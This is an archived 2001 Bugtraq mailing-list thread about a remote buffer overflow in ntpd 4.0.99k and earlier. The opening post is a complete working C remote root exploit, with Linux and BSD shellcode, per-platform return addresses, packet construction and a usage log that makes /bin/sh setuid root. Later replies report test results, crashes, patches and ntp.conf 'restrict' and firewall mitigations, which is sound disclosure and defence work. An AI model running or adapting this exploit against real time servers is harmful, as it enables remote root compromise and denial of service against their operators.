6315271 2001-04-04 22:27 +0200 /286 rader/ Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-05 00:17 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: venglin@FREEBSD.LUBLIN.PL
Mottagare: Bugtraq (import) <16329>
Ärende: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010404222701.X91913@riget.scene.pl>
/* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */
/*
* Network Time Protocol Daemon (ntpd) shipped with many systems is vulnerable
* to remote buffer overflow attack. It occurs when building response for
* a query with large readvar argument. In almost all cases, ntpd is running
* with superuser privileges, allowing to gain REMOTE ROOT ACCESS to timeserver.
*
* Althought it's a normal buffer overflow, exploiting it is much harder.
* Destination buffer is accidentally damaged, when attack is performed, so
* shellcode can't be larger than approx. 70 bytes. This proof of concept code
* uses small execve() shellcode to run /tmp/sh binary. Full remote attack
* is possible.
*
* NTP is stateless UDP based protocol, so all malicious queries can be
* spoofed.
*
* Example of use on generic RedHat 7.0 box:
*
* [venglin@cipsko venglin]$ cat dupa.c
* main() { setreuid(0,0); system("chmod 4755 /bin/sh"); }
* [venglin@cipsko venglin]$ cc -o /tmp/sh dupa.c
* [venglin@cipsko venglin]$ cc -o ntpdx ntpdx.c
* [venglin@cipsko venglin]$ ./ntpdx -t2 localhost
* ntpdx v1.0 by venglin@freebsd.lublin.pl
*
* Selected platform: RedHat Linux 7.0 with ntpd 4.0.99k-RPM (/tmp/sh)
*
* RET: 0xbffff777 / Align: 240 / Sh-align: 160 / sending query
* [1] <- evil query (pkt = 512 | shell = 45)
* [2] <- null query (pkt = 12)
* Done.
* /tmp/sh was spawned.
* [venglin@cipsko venglin]$ ls -al /bin/bash
* -rwsr-xr-x 1 root root 512540 Aug 22 2000 /bin/bash
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#include <arpa/inet.h>
#define NOP 0x90
#define ADDRS 8
#define PKTSIZ 512
static char usage[] = "usage: ntpdx [-o offset] <-t type> <hostname>";
/* generic execve() shellcodes */
char lin_execve[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/tmp/sh";
char bsd_execve[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/tmp/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";
struct platforms
{
char *os;
char *version;
char *code;
long ret;
int align;
int shalign;
int port;
};
/* Platforms. Notice, that on FreeBSD shellcode must be placed in packet
* *after* RET address. This values will vary from platform to platform.
*/
struct platforms targ[] =
{
{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
0xbfbff8bc, 200, 220, 0 },
{ "FreeBSD 4.2-STABLE", "4.0.99k (/tmp/sh)", bsd_execve,
0xbfbff540, 200, 220, 0 },
{ "RedHat Linux 7.0", "4.0.99k-RPM (/tmp/sh)", lin_execve,
0xbffff777, 240, 160, 0 },
{ NULL, NULL, NULL, 0x0, 0, 0, 0 }
};
long getip(name)
char *name;
{
struct hostent *hp;
long ip;
extern int h_errno;
if ((ip = inet_addr(name)) < 0)
{
if (!(hp = gethostbyname(name)))
{
fprintf(stderr, "gethostbyname(): %s\n",
strerror(h_errno));
exit(1);
}
memcpy(&ip, (hp->h_addr), 4);
}
return ip;
}
int doquery(host, ret, shellcode, align, shalign)
char *host, *shellcode;
long ret;
int align, shalign;
{
/* tcpdump-based reverse engineering :)) */
char q2[] = { 0x16, 0x02, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x01, 0x36, 0x73, 0x74, 0x72, 0x61,
0x74, 0x75, 0x6d, 0x3d };
char q3[] = { 0x16, 0x02, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00 };
char buf[PKTSIZ], *p;
long *ap;
int i;
int sockfd;
struct sockaddr_in sa;
bzero(&sa, sizeof(sa));
sa.sin_family = AF_INET;
sa.sin_port = htons(123);
sa.sin_addr.s_addr = getip(host);
if((sockfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0)
{
perror("socket");
return -1;
}
if((connect(sockfd, (struct sockaddr *)&sa, sizeof(sa))) < 0)
{
perror("connect");
close(sockfd);
return -1;
}
memset(buf, NOP, PKTSIZ);
memcpy(buf, q2, sizeof(q2));
p = buf + align;
ap = (unsigned long *)p;
for(i=0;i<ADDRS/4;i++)
*ap++ = ret;
p = (char *)ap;
memcpy(buf+shalign, shellcode, strlen(shellcode));
if((write(sockfd, buf, PKTSIZ)) < 0)
{
perror("write");
close(sockfd);
return -1;
}
fprintf(stderr, "[1] <- evil query (pkt = %d | shell = %d)\n", PKTSIZ,
strlen(shellcode));
fflush(stderr);
if ((write(sockfd, q3, sizeof(q3))) < 0)
{
perror("write");
close(sockfd);
return -1;
}
fprintf(stderr, "[2] <- null query (pkt = %d)\n", sizeof(q3));
fflush(stderr);
close(sockfd);
return 0;
}
int main(argc, argv)
int argc;
char **argv;
{
extern int optind, opterr;
extern char *optarg;
int ch, type, ofs, i;
long ret;
opterr = ofs = 0;
type = -1;
while ((ch = getopt(argc, argv, "t:o:")) != -1)
switch((char)ch)
{
case 't':
type = atoi(optarg);
break;
case 'o':
ofs = atoi(optarg);
break;
case '?':
default:
puts(usage);
exit(0);
}
argc -= optind;
argv += optind;
fprintf(stderr, "ntpdx v1.0 by
venglin@freebsd.lublin.pl\n\n");
if (type < 0)
{
fprintf(stderr, "Please select platform:\n");
for (i=0;targ[i].os;i++)
{
fprintf(stderr, "\t-t %d : %s %s (%p)\n", i,
targ[i].os, targ[i].version, (void *)targ[i].ret);
}
exit(0);
}
fprintf(stderr, "Selected platform: %s with ntpd %s\n\n",
targ[type].os, targ[type].version);
ret = targ[type].ret;
ret += ofs;
if (argc != 1)
{
puts(usage);
exit(0);
}
fprintf(stderr, "RET: %p / Align: %d / Sh-align: %d / sending query\n",
(void *)ret, targ[type].align, targ[type].shalign);
if (doquery(*argv, ret, targ[type].code, targ[type].align,
targ[type].shalign) < 0)
{
fprintf(stderr, "Failed.\n");
exit(1);
}
fprintf(stderr, "Done.\n");
if (!targ[type].port)
{
fprintf(stderr, "/tmp/sh was spawned.\n");
exit(0);
}
exit(0);
}
-- * Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL:
PMF9-RIPE * * Inet: przemyslaw@frasunek.com ** PGP:
D48684904685DF43EA93AFA13BE170BF *
(6315271) /Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>/(Ombruten)
Kommentar i text 6315541 av Crist Clark <crist.clark@GLOBALSTAR.COM>
Kommentar i text 6316095 av Nixon (remontado)
6315541 2001-04-04 18:49 -0700 /40 rader/ Crist Clark <crist.clark@GLOBALSTAR.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-05 05:10 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: crist.clark@GLOBALSTAR.COM
Mottagare: Bugtraq (import) <16335>
Kommentar till text 6315271 av Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Crist Clark <crist.clark@GLOBALSTAR.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <3ACBCF0D.847AECA4@globalstar.com>
Przemyslaw Frasunek wrote:
>
> /* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */
Not good. Not good. Verified the exploit worked on FreeBSD 4.2-STABLE
with the stock 4.0.99b. FreeBSD has a fix in CURRENT already.
More sobering, blindly aiming the exploit code at a Sparc running
xntpd 3.4y caused it to seg. fault and core. No time to double-check
if that is actually exploitable at this moment. How many NTP
distributions are based off of the vulnerable code? With the small
payload, gaining access might be hard, but the potential for DoS
looks pretty easy.
Playing with 'restrict' statements in the ntp.conf will prevent the
attacks (I tried, looks like it works), but with UDP NTP so trivial to
spoof, that only will get you so far. But can I assume that properly
using authorization keys will protect you from this attack (assuming
whoever else has the keys is trusted) in a similar way? My guess is
that it should, but I have not had the chance to double check the
protocol or actually run the test on that one.
But this really troubling when trying to use a public NTP server.
--
Crist J. Clark Network Security Engineer
crist.clark@globalstar.com Globalstar, L.P.
(408) 933-4387 FAX: (408) 933-4926
The information contained in this e-mail message is confidential,
intended only for the use of the individual or entity named above.
If the reader of this e-mail is not the intended recipient, or the
employee or agent responsible to deliver it to the intended
recipient, you are hereby notified that any review, dissemination,
distribution or copying of this communication is strictly prohibited.
If you have received this e-mail in error, please contact
postmaster@globalstar.com
(6315541) /Crist Clark <crist.clark@GLOBALSTAR.COM>/(Ombruten)
6323242 2001-04-04 14:38 -0700 /31 rader/ Gary E. Miller <gem@RELLIM.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 03:16 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: gem@RELLIM.COM
Mottagare: Bugtraq (import) <16343>
Kommentar till text 6315271 av Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: "Gary E. Miller" <gem@RELLIM.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.32.0104041436490.591-100000@catbert.rellim.com>
Yo All!
ftp.udel.edu lists ntp 4.0.99k as the newest available.
Any patches yet?
Have the maintainers been notified?
RGDS
GARY
---------------------------------------------------------------------------
Gary E. Miller Rellim 20340 Empire Ave, Suite E-3, Bend, OR 97701
gem@rellim.com Tel:+1(541)382-8588 Fax: +1(541)382-8676
On Wed, 4 Apr 2001, Przemyslaw Frasunek wrote:
> /*
> * Network Time Protocol Daemon (ntpd) shipped with many systems is vuln
> erable
> * to remote buffer overflow attack. It occurs when building response fo
> r
> * a query with large readvar argument. In almost all cases, ntpd is run
> ning
> * with superuser privileges, allowing to gain REMOTE ROOT ACCESS to tim
> eserver.
(6323242) /Gary E. Miller <gem@RELLIM.COM>/---------
6323277 2001-04-05 11:38 +0200 /29 rader/ Ogle Ron (Rennes) <OgleR@THMULTI.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 04:13 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: OgleR@THMULTI.COM
Mottagare: Bugtraq (import) <16344>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: "Ogle Ron (Rennes)" <OgleR@THMULTI.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <05B4910E0216D411B14F00508B6A67A901213F7E@RENEXCH5.rennes.thmulti.com>
There is only a patch for the NTP software from
http://phk.freebsd.dk/patch/ntpd.patch. We are going to wait for a
full released and tested version of NTP to be released from
http://www.ntp.org/. Until that time, we are blocking NTP access
from the Internet (for those of us who use Internet stratum 1
servers) for the NTP protocol. This should be a very low risk
situation because or internal, stratum 2, server will keep time close
enough to "real" time for at least the next several days.
I suggest that other people in the same situation do the same until a
proper fix is made.
My .02
Ron Ogle
-----Original Message-----
From: Przemyslaw Frasunek [mailto:venglin@FREEBSD.LUBLIN.PL]
Sent: Wednesday, April 04, 2001 10:27 PM
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: ntpd =< 4.0.99k remote buffer overflow
/* ntpd remote root exploit / babcia padlina ltd.
<venglin@freebsd.lublin.pl> */
(6323277) /Ogle Ron (Rennes) <OgleR@THMULTI.COM>/(Ombruten)
6323336 2001-04-05 14:08 +0200 /30 rader/ Tomasz Grabowski <cadence@APOLLO.ACI.COM.PL>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 05:07 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: cadence@APOLLO.ACI.COM.PL
Mottagare: Bugtraq (import) <16346>
Kommentar till text 6315541 av Crist Clark <crist.clark@GLOBALSTAR.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Tomasz Grabowski <cadence@APOLLO.ACI.COM.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.LNX.4.10.10104051358390.8483-100000@apollo.aci.com.pl>
On Wed, 4 Apr 2001, Crist Clark wrote:
> Przemyslaw Frasunek wrote:
> >
> > /* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */
>
> Not good. Not good. Verified the exploit worked on FreeBSD 4.2-STABLE with
> the stock 4.0.99b. FreeBSD has a fix in CURRENT already.
>
> More sobering, blindly aiming the exploit code at a Sparc running xntpd 3.4y
> caused it to seg. fault and core. No time to double-check if that is actually
> exploitable at this moment. How many NTP distributions are based off of the
> vulnerable code? With the small payload, gaining access might be hard, but
> the potential for DoS looks pretty easy.
On IRIX 6.5.11 it also seg faults.
ntpq
ntpq> version
ntpq 3-5.93e Thu Dec 10 10:49:39 PST 1998 (1)
ntpq> quit
It's rather old isn't it?
It's the default IRIX 6.5.11 installation.
(6323336) /Tomasz Grabowski <cadence@APOLLO.ACI.COM.PL>/
6323400 2001-04-05 08:52 -0300 /35 rader/ Durval Menezes <durval@TMP.COM.BR>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 05:20 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: durval@TMP.COM.BR
Mottagare: Bugtraq (import) <16347>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Durval Menezes <durval@TMP.COM.BR>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010405085243.C31459@tmp.com.br>
Hello,
> Not good. Not good. Verified the exploit worked on FreeBSD 4.2-STABLE with
> the stock 4.0.99b. FreeBSD has a fix in CURRENT already.
>
> More sobering, blindly aiming the exploit code at a Sparc running xntpd 3.4y
> caused it to seg. fault and core. No time to double-check if that is actually
> exploitable at this moment. How many NTP distributions are based off of the
> vulnerable code? With the small payload, gaining access might be hard, but
> the potential for DoS looks pretty easy.
Tried here against stock xntpd 3.5f (from xntpd-3.5f-3.i386.rpm) on a
Redhat Linux 3.0.3 w/ kernel 2.0.36, and the exploit didn't have ANY
effect: no root shell was spawned, and the daemon stayed up. An
"strace" of the running xntpd process confirmed this: no exec
syscalls were attempted.
Same think on SPARC Solaris 2.5.1 also running xntpd 3.5f: no shell,
and the xntpd daemon stayed up with no exec syscalls showing on
"truss".
Another vindication for those (like me) that don't like to run the
"latest and greatest" versions of any code (I only upgrade my
machines when forced to, either because of security bugs, or because
of desperately needed new functionality, and even then only after
running it for awhile on a test system INSIDE my firewall, and
preferably doing an audit on the code myself).
Best regards,
--
Durval Menezes (durval AT tmp DOT com DOT br, http://www.tmp.com.br/)
(6323400) /Durval Menezes <durval@TMP.COM.BR>/(Ombruten)
6323528 2001-04-05 20:03 -0400 /21 rader/ Charles Sprickman <spork@INCH.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 05:45 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: spork@INCH.COM
Mottagare: Bugtraq (import) <16348>
Kommentar till text 6315271 av Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Charles Sprickman <spork@INCH.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.BSF.4.30.0104052001020.21512-100000@shell.inch.com>
On Wed, 4 Apr 2001, Przemyslaw Frasunek wrote:
> /* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */
Just a quick note to save others a bit of legwork... If you are
running ntpd on a machine simply as a client, the following line in
/etc/ntp.conf should keep people away:
restrict default ignore
Before adding this (I actually had the wrong syntax), the exploit
crashed ntpd. Afterwords, not a blip, and ntpdate shows that ntpd is
not answering anything...
Charles
(6323528) /Charles Sprickman <spork@INCH.COM>/(Ombruten)
6323794 2001-04-05 15:30 +0100 /30 rader/ Matt Collins <matt@CLUES.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 07:15 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: matt@CLUES.COM
Mottagare: Bugtraq (import) <16351>
Kommentar till text 6315541 av Crist Clark <crist.clark@GLOBALSTAR.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Matt Collins <matt@CLUES.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010405153042.A3064@sherlock.clues.com>
On Wed, Apr 04, 2001 at 06:49:01PM -0700, Crist Clark wrote:
> Przemyslaw Frasunek wrote:
> >
> > /* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.pl> */
>
> Not good. Not good. Verified the exploit worked on FreeBSD 4.2-STABLE with
> the stock 4.0.99b. FreeBSD has a fix in CURRENT already.
>
> More sobering, blindly aiming the exploit code at a Sparc running xntpd 3.4y
> caused it to seg. fault and core. No time to double-check if that is actually
> exploitable at this moment. How many NTP distributions are based off of the
> vulnerable code? With the small payload, gaining access might be hard, but
> the potential for DoS looks pretty easy.
We've taken a peek at getting sparc shellcode working with
this. Getting it in below the 70 byte buffer size is tricky.
Does anybody out there have working shellcode for this that can do
*anything* to the state of the system even if it doesnt lead to full
sploit? (beyond making ntp core of course ;) )
cheers,
Matt
(6323794) /Matt Collins <matt@CLUES.COM>/-(Ombruten)
6324567 2001-04-05 15:12 -0400 /36 rader/ Charles Sprickman <spork@INCH.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 10:24 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: spork@INCH.COM
Mottagare: Bugtraq (import) <16354>
Kommentar till text 6315541 av Crist Clark <crist.clark@GLOBALSTAR.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Charles Sprickman <spork@INCH.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <Pine.BSF.4.30.0104051512090.21512-100000@shell.inch.com>
On Wed, 4 Apr 2001, Crist Clark wrote:
> Playing with 'restrict' statements in the ntp.conf will prevent the
> attacks (I tried, looks like it works), but with UDP NTP so trivial to
> spoof, that only will get you so far. But can I assume that properly
> using authorization keys will protect you from this attack (assuming
> whoever else has the keys is trusted) in a similar way? My guess is
> that it should, but I have not had the chance to double check the
> protocol or actually run the test on that one.
Has anyone verified that the access list prevents such things?
Thanks,
Charles
> But this really troubling when trying to use a public NTP server.
> --
> Crist J. Clark Network Security Engineer
> crist.clark@globalstar.com Globalstar, L.P.
> (408) 933-4387 FAX: (408) 933-4926
>
> The information contained in this e-mail message is confidential,
> intended only for the use of the individual or entity named above. If
> the reader of this e-mail is not the intended recipient, or the employee
> or agent responsible to deliver it to the intended recipient, you are
> hereby notified that any review, dissemination, distribution or copying
> of this communication is strictly prohibited. If you have received this
> e-mail in error, please contact postmaster@globalstar.com
>
(6324567) /Charles Sprickman <spork@INCH.COM>/------
6324741 2001-04-04 21:02 -0400 /10 rader/ Klaus Steden <klaus@COMPT.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 10:48 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: klaus@COMPT.COM
Mottagare: Bugtraq (import) <16355>
Kommentar till text 6315271 av Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Klaus Steden <klaus@COMPT.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010404210222.Y879@cthulu.compt.com>
Both exploits crash 4.0.99b on FreeBSD 4.2-STABLE; the first dies
with SIGBUS, the second with SIGILL.
Klaus
(6324741) /Klaus Steden <klaus@COMPT.COM>/(Ombruten)
6324880 2001-04-04 20:46 -0700 /57 rader/ Christopher McCrory <chrismcc@PRICEGRABBER.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 11:10 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: chrismcc@PRICEGRABBER.COM
Mottagare: Bugtraq (import) <16358>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow]
------------------------------------------------------------
From: Christopher McCrory <chrismcc@PRICEGRABBER.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <3ACBEA83.8090801@pricegrabber.com>
Hello...
In this message I was replying to a co-worker, but others
might benefit.
you wrote:
> I use the following code snippet in my /etc/rc.d/rc.firewall code
which runs
> whenever I start my machine:
>
> #
> # NTP from SPECIFIC SERVERS. Make sure to re-run /etc/rc.d/rc.firewall
> # if you change the list of these servers, as we don't want to provide
> # NTP to other clients that aren't us.
> #
> for i in `awk '/^server/ && !/127.127.1.0/ {print $2}' /etc/ntp.conf`; do
> $IPCHAINS -A input -i $EXTERNALIF -p udp -s $i/32 -d $EXTERNALIP/32
ntp -j
> ACCEPT
> done
>
> =================
>
> The above causes the server to only pay attention to NTP traffic
originating
> from known servers in my /etc/ntp.conf file. (The default is to DENY all
> unknown traffic.) But because it's a good idea ot fix this sort of
problem
> generally, I'll look for a patch from RedHat. Thanks for the update.
>
Four years ago spoofing a tcp connection was hard, but not
impossible. Today it is, in practice, impossible due to real (not
psuedo) random sequence numbers. Spoofing a udp session is still
easy due to it's conectionless properties. The NTP protocol uses
udp. There aren't _that_ many stratum 1 and 2 ntp servers. The
sample code executed "/tmp/sh", but there is no reason it couldn't
execute "/sbin/ipchains --flush". Followed by a 'real' exploit.
--
Christopher McCrory
"The guy that keeps the servers running"
chrismcc@pricegrabber.com
http://www.pricegrabber.com
"Linux: Because rebooting is for adding new hardware"
(6324880) /Christopher McCrory <chrismcc@PRICEGRABBER.COM>/(Ombruten)
6324968 2001-04-04 20:10 -0700 /17 rader/ Bruce A. Mah <bmah@CISCO.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 11:28 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: bmah@cisco.com
Mottagare: Bugtraq (import) <16359>
Kommentar till text 6315541 av Crist Clark <crist.clark@GLOBALSTAR.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
If memory serves me right, Crist Clark wrote:
> Przemyslaw Frasunek wrote:
> >
> > /* ntpd remote root exploit / babcia padlina ltd. <venglin@freebsd.lublin.p
> l> */
>
> Not good. Not good. Verified the exploit worked on FreeBSD 4.2-STABLE with
> the stock 4.0.99b. FreeBSD has a fix in CURRENT already.
FreeBSD 4-STABLE got the fix a couple minutes later.
Bruce.
(6324968) /Bruce A. Mah <bmah@CISCO.COM>/-----------
Bilaga (application/pgp-signature) i text 6324969
6324969 2001-04-04 20:10 -0700 /10 rader/ Bruce A. Mah <bmah@CISCO.COM>
Importerad: 2001-04-06 11:28 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: bmah@cisco.com
Mottagare: Bugtraq (import) <16360>
Bilaga (text/plain) till text 6324968
Ärende: Bilaga till: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.4 (FreeBSD)
Comment: Exmh version 2.2 06/23/2000
iD8DBQE6y+I52MoxcVugUsMRAgrkAKCULaMwBRg1NETvgu+ERsJ74kOAqACeODFZ
ZLOEFaVV40VWLlG9mLfbhII=
=5Ayh
-----END PGP SIGNATURE-----
(6324969) /Bruce A. Mah <bmah@CISCO.COM>/-----------
6328704 2001-04-05 22:56 -0500 /25 rader/ Stephen Clouse <stephenc@THEIQGROUP.COM>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 20:11 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: stephenc@THEIQGROUP.COM
Mottagare: Bugtraq (import) <16362>
Kommentar till text 6315271 av Przemyslaw Frasunek <venglin@FREEBSD.LUBLIN.PL>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Stephen Clouse <stephenc@THEIQGROUP.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010405225645.A280@owns.warpcore.org>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Having no effect on ntp-4.0.99k compiled from official source on
Slackware 7.0. Exploit says /tmp/sh was spawned but it never
actually runs (/bin/bash mode didn't change).
- --
Stephen Clouse <stephenc@theiqgroup.com>
Senior Programmer, IQ Coordinator Project Lead
The IQ Group, Inc. <http://www.theiqgroup.com/>
-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8
iQA/AwUBOs0+fQOGqGs0PadnEQKscQCfYNJ7FaEtsTsszoMV808EtU4ICesAoLp3
WBFZUQZ0nrNyd/MwAG0178Qu
=YatU
-----END PGP SIGNATURE-----
(6328704) /Stephen Clouse <stephenc@THEIQGROUP.COM>/(Ombruten)
6328774 2001-04-06 16:58 +0200 /32 rader/ Jan Kluka <kluka@DANKA.II.FMPH.UNIBA.SK>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 20:28 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: kluka@DANKA.II.FMPH.UNIBA.SK
Mottagare: Bugtraq (import) <16364>
Kommentar till text 6323528 av Charles Sprickman <spork@INCH.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
From: Jan Kluka <kluka@DANKA.II.FMPH.UNIBA.SK>
To: BUGTRAQ@SECURITYFOCUS.COM
Message-ID: <20010406165809.A7355@danka.ii.fmph.uniba.sk>
On Thu, Apr 05, 2001 at 08:03:38PM -0400, Charles Sprickman wrote:
...
> Just a quick note to save others a bit of legwork... If you are running
> ntpd on a machine simply as a client, the following line in /etc/ntp.conf
> should keep people away:
>
> restrict default ignore
>
> Before adding this (I actually had the wrong syntax), the exploit crashed
> ntpd. Afterwords, not a blip, and ntpdate shows that ntpd is not
> answering anything...
Time servers which ntpd is synchronized to, are also subjected to the
restriction. So, if this is the only `restrict' in your ntp.conf, it
also prevents synchronization to the time server.
Besides `restrict default ignore' there should be
restrict time.server.address nomodify
for every 'server time.server.address' in your ntp.conf.
Now, ntpd can be crashed/exploited only by evil queries comming from
time.server.address (or by UDP-spoofed queries from anywhere else
:-/).
JK
(6328774) /Jan Kluka <kluka@DANKA.II.FMPH.UNIBA.SK>/(Ombruten)
6328790 2001-04-05 22:25 -0600 /21 rader/ William D. Colburn (aka Schlake) <wcolburn@NMT.EDU>
Sänt av: joel@lysator.liu.se
Importerad: 2001-04-06 20:31 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: wcolburn@NMT.EDU
Mottagare: Bugtraq (import) <16365>
Kommentar till text 6323242 av Gary E. Miller <gem@RELLIM.COM>
Ärende: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
I sent them a short mail asking if they know, and got back a short
mail saying lots and lots had reported it.
On Wed, Apr 04, 2001 at 02:38:13PM -0700, Gary E. Miller wrote:
> Yo All!
>
> ftp.udel.edu lists ntp 4.0.99k as the newest available.
>
> Any patches yet?
>
> Have the maintainers been notified?
>
> RGDS
> GARY
--
William Colburn, "Sysprog" <wcolburn@nmt.edu>
Computer Center, New Mexico Institute of Mining and Technology
http://www.nmt.edu/tcc/ http://www.nmt.edu/~wcolburn
(6328790) /William D. Colburn (aka Schlake) <wcolburn@NMT.EDU>/(Ombruten)
Bilaga (message/rfc822) i text 6328791
6328791 2001-04-05 22:25 -0600 /19 rader/ William D. Colburn (aka Schlake) <wcolburn@NMT.EDU>
Importerad: 2001-04-06 20:31 av Brevbäraren
Extern mottagare: BUGTRAQ@SECURITYFOCUS.COM
Externa svar till: wcolburn@NMT.EDU
Mottagare: Bugtraq (import) <16366>
Bilaga (text/plain) till text 6328790
Ärende: Bilaga till: Re: ntpd =< 4.0.99k remote buffer overflow
------------------------------------------------------------
Return-Path: <mills@huey.udel.edu>
Received: from huey.udel.edu (huey.ee.udel.edu [128.175.2.18])
by mailhost.nmt.edu (8.11.3/8.11.3) with SMTP id f35Ft6T08503
for <wcolburn@nmt.edu>; Thu, 5 Apr 2001 09:55:06 -0600
Date: Thu, 5 Apr 2001 11:54:47 EDT
From: Dave Mills <mills@huey.udel.edu>
To: "William D. Colburn" (aka Schlake) <wcolburn@nmt.edu>
cc: mills@udel.edu
Subject: Re: ntpd buffer overflow
Message-ID: <200104051154.aa01903@huey.udel.edu>
William,
Be advised I/we are aware of the problem. Lots and lots of folks have
reported it.
Dave
(6328791) /William D. Colburn (aka Schlake) <wcolburn@NMT.EDU>/
